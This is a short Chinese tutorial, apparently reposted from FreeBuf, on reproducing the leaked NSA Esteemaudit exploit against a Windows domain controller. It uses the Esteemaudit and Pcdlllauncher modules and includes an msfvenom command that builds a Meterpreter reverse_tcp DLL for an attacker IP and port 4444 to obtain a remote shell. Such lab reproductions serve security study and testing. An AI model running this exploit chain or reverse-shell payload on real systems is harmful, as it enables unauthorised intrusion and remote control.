ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程

近日臭名昭著的方程式组织工具包再次被公开,TheShadowBrokers在steemit.com博客上提供了相关消息。以下是其中Esteemaudit漏洞复现过程。

前期准备

靶机环境

需要域控环境

Esteemaudit漏洞复现过程

use Esteemaudit使用漏洞模块

设置目标IP和端口

然后基本上默认,基本配置如下:

运行后再进行配置。

然后基本上选择相对应的设置,CallbackIp填自己的,端口随便

然后配置DLL。注意这里默认路径基本上是不对,找到自己对应的文件路径进行修改:

然后基本上配置如下

可以运行了

利用Pcdlllauncher注入DLL

使用Pcdlllauncher

use Pcdlllauncher

然后生成用于反弹shell的dll payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.146.129 LPORT=4444 -f dll >win.dll

然后进行配置

找到自己对应的文件路径修改

要注入的恶意DLL文件路径

然后基本上默认,运行就行了,成功注入

查看Metasploit,成功返回shell

原文发布于微信公众号 - FreeBuf(freebuf)

原文发表时间:2017-04-20

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏个人分享

Linux知识体系之路径属性与目录

  最近在看鸟哥的Linux私房菜,我觉得这本书还是很不错的。这里进行相关的总结。

1011
来自专栏服务器CVM

【使用教程】手把手教你入门腾讯云服务器

2)使用购买服务器的微信,扫描二维码登陆,如果非微信账号,可以选择二维码下方其他登录方式

14.9K5
来自专栏张戈的专栏

利用Centos或RedHat的iso镜像搭建本地yum仓库

这两天工作是用几台 PC 机给开发组搭建本地测试环境:CentOS-6.4-x86_64 + ant + svn。 为了操作简单及系统稳定,全部系统采用最小化安...

4105
来自专栏运维一切

docker镜像远程转移

1894
来自专栏bluesummer

Windows下docker的安装,将ASP.NET Core程序部署在docker中

参考文章: https://www.cnblogs.com/jRoger/p/aspnet-core-deploy-to-docker.html https...

4846
来自专栏Rainbond开源「容器云平台」

「Rainbond最佳实践」Tomcat配置Redis实现Session共享

2022
来自专栏草根专栏

学习docker on windows (1): 为什么要使用docker

为什么要用Docker? 如果我们想使用某种pc软件, 那么在互联网上查找并安装软件的流程大致如下图: ? 那么这就有几个问题要弄清楚: 从哪里获得软件 Ap...

3876
来自专栏云计算教程系列

Kubernetes DNS服务简介

域名系统(DNS)是一种用于将各种类型的信息(例如IP地址)与易于记忆的名称相关联的系统。默认情况下,大多数Kubernetes群集会自动配置内部DNS服务,以...

2914
来自专栏静下来

腾讯云Linux系统盘网站数据更换至数据盘

主要看你原网站的目录叫什么名称,如果原网站目录文件夹是用的一键安装包,也就是叫:alidata 那就不能按照第四步来了,这样可能会出错的。 今天来把腾讯云的也挂...

6316
来自专栏运维小白

Linux基础(day56)

14.1 NFS介绍 NFS介绍 NFS是Network File System的缩写;这个文件系统是基于网路层面,通过网络层面实现数据同步 NFS最早...

2479

扫码关注云+社区

领取腾讯云代金券